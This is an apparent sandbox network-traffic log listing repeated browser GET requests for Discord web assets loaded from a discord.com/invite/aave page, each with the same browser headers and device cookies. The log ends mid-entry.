Source: global trafficHTTP traffic detected: GET /assets/8bd8143eff37936894aa.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/69646.560b06bc5c21054b4473.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/452d7be36bf4b23241bd.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/69646.560b06bc5c21054b4473.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/48a594e29497835802fe.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/69646.560b06bc5c21054b4473.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/f5b8aa3411dfc24ff2e6.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/69646.560b06bc5c21054b4473.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/ac625b77a0bab0ee72df.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /api/v9/experiments?with_guild_experiments=true HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/29a63f12209c956d9204.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/version.stable.json?_=5758322 HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /application-services/products/web3/ HTTP/1.1Host: www.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=PgqFTlEBbGY_EfZJRhQU52zUW0xdvnX1xdT694RQlsI-1727496728-1.0.1.1-lJ7MRdoznbgUYWapQQJtW2l_HJI9rIgC53Ns4YHwKC1rzKeOqSOR6nauw41fznOhbpFHdxBIgMqOFTupXtpn0Vo7VHjiN8Oxn2jkaSL76Vg
Source: global trafficHTTP traffic detected: GET /assets/5067a2ec1b24a6de868c.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/assets/ac625b77a0bab0ee72df.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/a6f6204cd40c3c5f5c14.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/assets/ac625b77a0bab0ee72df.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/44754ba5aa3d478d8c43.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/ac625b77a0bab0ee72df.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/29a63f12209c956d9204.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/1bab9b095996b8d024ce.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/assets/ac625b77a0bab0ee72df.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/f93d6452fe5ed4c7077a.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/5067a2ec1b24a6de868c.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/d67c5e680608266a1f63.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/afd372d42c991d346d6b.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js? HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/a6f6204cd40c3c5f5c14.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/b595a2694f43514497d1.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/30e761b4e93a24b607b9.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/1bab9b095996b8d024ce.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/44754ba5aa3d478d8c43.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/d67c5e680608266a1f63.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/f93d6452fe5ed4c7077a.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/0f4597d59327b36932f5.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/bfcdec9c24c821355547.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/be6659ffbe2faab6ce6f.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; 